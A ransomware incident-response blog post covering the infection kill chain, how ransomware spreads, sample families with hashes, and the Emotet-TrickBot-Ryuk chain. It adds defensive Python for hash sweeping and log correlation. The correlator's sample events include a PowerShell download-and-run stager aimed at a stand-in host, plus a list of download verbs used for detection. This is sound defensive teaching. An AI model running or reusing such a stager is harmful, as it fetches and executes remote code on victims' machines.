October 28, 2019

Incident Response Ransomware Series: Part 1

Written by TrustedSec
Categories: Incident Response, Incident Response & Forensics

In this three-part blog post series, we will provide an introduction to what ransomware is, how it works, and how it spreads to systems within an organization. We will also provide examples of different types of ransomware and of variations in ransomware tactics.

In part two, we will go in-depth to understand the various attack vectors ransomware uses, as well as ways to detect, protect, and prevent ransomware. In part three, we will identify ransomware variants and sites used for identification. We will also touch on the various recovery options and answer the big question—should you pay the ransom?

What is Ransomware?

Ransomware is a class of malicious software designed to extort money from users by disabling the functionality of important computer systems or by encrypting files on the infected device as well as shared or networked drives.

Infection Kill Chain

Most ransomware families exhibit similar behaviors during infection. While part two of this blog series will cover ransomware attack vectors and the attack kill chain, in this section we will walk through the chain of events that occurs during an infection.

The infection begins once the victim downloads a dropper (a program designed to install malware on a target system). We will examine the individual infection stages and, taken together, they form the infection kill chain.

  • Malware Download: When the system is infected with a dropper, there is a command and control (C2) communication to download a malicious executable. The dropper then copies the malicious executable to a local directory, or in some cases, it injects the malicious code into a running process.
  • Persistence Method: The ransomware attempts to create persistence mechanisms using various methods, the most common of which are described below:
    • Creates Run and RunOnce registry keys
    • Copies itself into %USERPROFILE%\Start Menu\Programs\Startup or %USERPROFILE%\AppData\Roaming (%APPDATA%)
    • Uses Scheduled tasks
  • Enumeration: Once the ransomware has established a persistence mechanism, it enumerates the local system, network shares, and even cloud storage, searching for files of interest.
  • Encryption: At this stage, the ransomware begins to encrypt the enumerated files. It encrypts each file, writes the encrypted version to the original location, and then deletes the original file. After encryption, the ransomware drops a ransom note demanding payment.

How it Spreads

While the most common method for spreading ransomware is through phishing emails, some variants have been seen spreading through other means. Various spreading mechanisms of ransomware include:

  • Spam emails
  • Exploit kits
  • Removable media
  • Drive-by downloads
  • Malware campaigns
  • Lateral movement using SMB
  • Web-based messaging applications
  • Deployed by another malware, such as TrickBot

Variations of Ransomware

Ransomware no longer merely disables system functionality or encrypts files on the infected device. Recent variants ship additional modules that can do much more. These ransomware variants can:

  • Encrypt Master Boot Record (MBR)
  • Delete files if the victim takes too long to make the ransom payment
  • Restrict access to files and data but will not encrypt them (known as non-encrypting ransomware)
  • Exfiltrate data to a threat actor (known as extortionware), which is normally accompanied by a threat to leak or publish the data/files if the ransom is not paid
  • Rename file extensions

Ransomware Samples

With over 30 active malware families, ransomware has been on the rise over the last decade. From the AIDS malware in 1989, Winlock in 2010, Locky in 2016, and even the recent Ryuk, we have seen a steady increase in the number of systems impacted by the various ransomware variants. A few of these ransomware samples are:

  • WannaCry: First seen in 2017, this malware infected over 100,000 organizations in 150 countries. Using the EternalBlue exploit, WannaCry ransomware exploits a vulnerability in the Windows implementation of the Server Message Block (SMB) protocol—a protocol that lets nodes on a network share files and communicate.
    Sample:  043e0d0d8b8cda56851f5b853f244f677bd1fd50f869075ef7ba1110771f70c2
  • TeslaCrypt: When TeslaCrypt emerged in 2015, it was delivered through exploit kits. Victims were redirected to a compromised site hosting the Nuclear exploit kit. Its infection chain looks identical to that of another ransomware called CryptoLocker.
    Sample:  83e62221df7ba94f18fc9b63fec82285d8694c0c0a2542c0196752dc81524a10
  • Ryuk: Similar to Hermes ransomware, Ryuk was first spotted in 2018 and was used to target enterprise environments. Dubbed one of the most sophisticated types of ransomware, Ryuk can shut down over 40 processes and around 180 services, including anti-virus, backup, and other programs. It is also capable of deleting all shadow copies on a targeted machine, removing a common local recovery option.
    Sample:  11f70be9ad30802f7a8d48197e5e4353fc537f6b13ae7c5164fff60a4a51b2ed
  • Cerber: In 2016, Cerber ransomware began making waves. This ransomware variant targets cloud-based Office 365 users and has infected millions.
    Sample:  6c9f7b72c39ae7d11f12dd5dc3fb70eb6c2263eaefea1ff06aa88945875daf27
  • Locky: First seen in 2016, this ransomware encrypts the victim’s files, appending a .locky extension, and prevents their use until a ransom is paid. An invoice-themed phishing email with a macro-enabled document usually kicks off the infection chain once the victim opens the attachment.
    Sample:  ff3e29a31f05016dedcd61a7aac588757c8364f04fa85b7a86196c9805cd811c
  • SamSam: One ransomware that operates in a targeted fashion is the SamSam ransomware. This ransomware has been known to target healthcare organizations. Its method of operation is to gain access to an organization’s network, spend time performing reconnaissance, then attempt to encrypt as many files as possible.
    Sample:  2f294d301d8bb9b947f41faf20df104710d5c4b2f469145d4e469ca7d1998b2f
  • Jigsaw: This ransomware was known for its ability to start deleting files if the ransom was not paid within 72 hours.
    Sample:  07955541315b1c376269b5081a25f277ae162c0a8612511c9aa65504df722d76
  • Sodinokibi: This ransomware exploited vulnerabilities in servers and other critical assets of small and medium-sized businesses (SMBs). In some instances, the ransomware searches the infected machine for AhnLab antivirus and uses it to inject its malicious payload. Similarities in the code suggest that this ransomware was created by the same group as the GandCrab ransomware.
    Sample:  139a7d6656feebe539b2cb94b0729602f6218f54fb5b7531b58cfe040f180548
  • Sorebrect: This fileless ransomware variant targets the Windows Operating System and is distributed through open remote desktop protocol (RDP) ports by brute-forcing administrator credentials. Once access to the targeted server is obtained, the malicious actor installs Sorebrect using PsExec. Once installed, it injects malicious code into the Windows svchost.exe process while its primary binary self-terminates.
    Sample:  4142ff4667f5b9986888bdcb2a727db6a767f78fe1d5d4ae3346365a1d70eb76
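Each entry above carries a SHA-256 sample hash, which is the usual way such indicators are shared and swept for during an incident. The following Python sweep is an added example, not part of the original post or TrustedSec's tooling: it streams files through SHA-256 and looks each digest up against the hashes listed above, normalizing case and whitespace so a copied indicator matches regardless of how it was pasted. The family names in the lookup table and the temporary demo files are constructed for the example.

```python
"""Added example: sweep a directory tree for the SHA-256 sample hashes
listed in the post. Hash matching catches only the exact samples, so treat
a clean sweep as 'these samples are absent', not 'no ransomware is present'."""
import hashlib
import os
import tempfile

# SHA-256 sample hashes exactly as listed in the post, keyed for lookup.
SAMPLE_HASHES = {
    "043e0d0d8b8cda56851f5b853f244f677bd1fd50f869075ef7ba1110771f70c2": "WannaCry",
    "83e62221df7ba94f18fc9b63fec82285d8694c0c0a2542c0196752dc81524a10": "TeslaCrypt",
    "11f70be9ad30802f7a8d48197e5e4353fc537f6b13ae7c5164fff60a4a51b2ed": "Ryuk",
    "6c9f7b72c39ae7d11f12dd5dc3fb70eb6c2263eaefea1ff06aa88945875daf27": "Cerber",
    "ff3e29a31f05016dedcd61a7aac588757c8364f04fa85b7a86196c9805cd811c": "Locky",
    "2f294d301d8bb9b947f41faf20df104710d5c4b2f469145d4e469ca7d1998b2f": "SamSam",
    "07955541315b1c376269b5081a25f277ae162c0a8612511c9aa65504df722d76": "Jigsaw",
    "139a7d6656feebe539b2cb94b0729602f6218f54fb5b7531b58cfe040f180548": "Sodinokibi",
    "4142ff4667f5b9986888bdcb2a727db6a767f78fe1d5d4ae3346365a1d70eb76": "Sorebrect",
}


def sha256_of_file(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 so large files need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def lookup(digest, iocs=SAMPLE_HASHES):
    """Family name for a digest, tolerant of case and surrounding whitespace."""
    return iocs.get(digest.strip().lower())


def scan_tree(root, iocs=SAMPLE_HASHES):
    """Walk `root` and return (path, digest, family) for every indicator hit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digest = sha256_of_file(path)
            except OSError:        # unreadable or vanished file: skip, keep scanning
                continue
            family = lookup(digest, iocs)
            if family:
                hits.append((path, digest, family))
    return hits


def demo_tree():
    """Create a temporary directory holding two constructed, harmless files."""
    root = tempfile.mkdtemp(prefix="ioc_demo_")
    with open(os.path.join(root, "abc.txt"), "wb") as fh:
        fh.write(b"abc")
    os.makedirs(os.path.join(root, "sub"))
    with open(os.path.join(root, "sub", "notes.txt"), "wb") as fh:
        fh.write(b"nothing to see here\n")
    return root


if __name__ == "__main__":
    for path, digest, family in scan_tree(demo_tree()):
        print(f"{family}: {path} ({digest})")
```

Because a single byte changed by a repacker yields a different digest, a hash sweep is a confirmation tool for known samples rather than a general detector; pair it with the behavioral indicators from the kill chain section.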

Triple Threat

Is ransomware always the beginning of the attack? Absolutely not. As ransomware continues to evolve and become more sophisticated, attackers now chain these ransomware samples into larger multi-stage malware campaigns. A prime example is the combination of Emotet, TrickBot, and Ryuk ransomware, as demonstrated in many of the recent government ransomware attacks, including one that hit 22 cities and towns in Texas and another that affected Georgia’s court system.

In this three-phase malware campaign, the first phase begins with the Emotet trojan. Emotet is a banking trojan that can steal financial information and credentials, and it is often used as a downloader or dropper for other malware. It starts with a Microsoft Office document containing malicious macro code, delivered through a phishing email. Once the victim opens the document, the macro runs and executes a PowerShell command. The PowerShell command then attempts to download and execute the Emotet payload from one of several malicious domains.

The second phase begins with Emotet using its delivery mechanism to drop and execute TrickBot, another banking trojan that uses code injection and redirects to steal financial information. It can spread laterally and deploy other tools and ransomware. When TrickBot infects the user’s system, it uses various modules and attempts to do the following:

  • Acquire credentials from the user’s machine
  • Disable AV services (it terminates the service if it finds specific DLLs in memory)
  • Inject into online banking activities to obtain credentials
  • Steal Bitcoin wallets
  • Search disk for specific files
  • Harvest user credentials from multiple saved locations (Outlook, browsers, RDP, VNC, etc.)
  • Launch additional malware. In most cases, this becomes the ransomware.

The third and final phase begins when TrickBot is used to download the Ryuk ransomware payload. Using the stolen credentials, it moves laterally to a desired target, injects the malicious payload, and encrypts the files. In our investigations, we have also seen threat actors manually deploy Ryuk onto critical systems within a victim’s environment using RDP or remote execution tools such as PsExec.
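The three phases above leave a trail that can be correlated: an Office process spawning PowerShell with a download-and-run command on the initial workstation, then network or RDP logons from that workstation to other hosts, and a PsExec service install on the hosts reached that way. The following Python correlator is an added example, not from the post or TrustedSec's tooling; the event field names are assumptions loosely modelled on process-creation, logon and service-install log records, the `PSEXESVC` service name is the default PsExec leaves in a 7045 service-install event, and all sample events are constructed (the stager URL uses the reserved `.invalid` domain).

```python
"""Added example: correlate the Emotet -> TrickBot -> Ryuk phases across
a constructed set of Windows events."""
import base64
import re

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
DOWNLOAD_VERBS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "invoke-expression", "iex", "bitstransfer")
# -e, -ec, -enc and -EncodedCommand all take a base64-encoded UTF-16LE script.
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None when absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_to_powershell(events):
    """Phase 1: an Office parent spawning PowerShell whose (decoded) command
    line carries download-and-run verbs, as the macro stage described above."""
    findings = []
    for ev in events:
        if ev["type"] != "process":
            continue
        if _basename(ev["parent"]) not in OFFICE_PARENTS or _basename(ev["image"]) != "powershell.exe":
            continue
        script = decode_encoded_command(ev["cmdline"]) or ev["cmdline"]
        if any(v in script.lower() for v in DOWNLOAD_VERBS):
            findings.append({"host": ev["host"], "user": ev["user"], "script": script})
    return findings


def lateral_chains(events):
    """Phase 3: tie a phase-1 host to hosts it then reached with PsExec
    (network logon type 3 plus a PSEXESVC service install) or RDP (logon
    type 10). A renamed PsExec service evades the name check; watch for
    any new service whose binary lives in a writable path as well."""
    origins = {f["host"] for f in office_to_powershell(events)}
    psexec_hosts = {ev["host"] for ev in events
                    if ev["type"] == "service_install" and ev["service"].upper() == "PSEXESVC"}
    chains = []
    for ev in events:
        if ev["type"] != "logon" or ev.get("src_host") not in origins:
            continue
        if ev["logon_type"] == 3 and ev["host"] in psexec_hosts:
            chains.append({"origin": ev["src_host"], "target": ev["host"], "via": "psexec"})
        elif ev["logon_type"] == 10:
            chains.append({"origin": ev["src_host"], "target": ev["host"], "via": "rdp"})
    return chains


def triple_threat_sample():
    """Constructed events: a macro stager on WS01, then PsExec to SRV01 and
    RDP to SRV02 from WS01; WS02 runs a legitimate scheduled script."""
    stager = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
    b64 = base64.b64encode(stager.encode("utf-16-le")).decode()
    office = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    return [
        {"type": "process", "host": "WS01", "user": r"CORP\alice", "parent": office,
         "image": ps, "cmdline": f"powershell -nop -w hidden -enc {b64}"},
        {"type": "process", "host": "WS02", "user": r"CORP\bob",
         "parent": r"C:\Windows\System32\svchost.exe", "image": ps,
         "cmdline": r"powershell -File C:\Scripts\nightly-backup.ps1"},
        {"type": "logon", "host": "SRV01", "logon_type": 3, "user": r"CORP\alice", "src_host": "WS01"},
        {"type": "service_install", "host": "SRV01", "service": "PSEXESVC",
         "path": r"C:\Windows\PSEXESVC.exe"},
        {"type": "logon", "host": "SRV02", "logon_type": 10, "user": r"CORP\alice", "src_host": "WS01"},
        {"type": "logon", "host": "SRV03", "logon_type": 3, "user": r"CORP\bob", "src_host": "WS02"},
    ]


if __name__ == "__main__":
    events = triple_threat_sample()
    print(office_to_powershell(events))
    print(lateral_chains(events))
```

Decoding `-EncodedCommand` before matching matters: the base64 form hides the download verbs from a plain substring search, and the same decode step is what lets a responder read what the macro actually tried to run. The correlation deliberately keys on the phase-1 host as the origin of later logons, which is the pivot the post describes when stolen credentials are reused for RDP or PsExec.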


As we have seen thus far, knowledge of ransomware capabilities is essential to any organization. Understanding its infection kill chain, the way it spreads, and the numerous samples and variants is a great way to stay ahead of the game.

In the next part of this blog series, we will go in-depth into understanding the various attack vectors, ransomware detection, protection, and prevention.
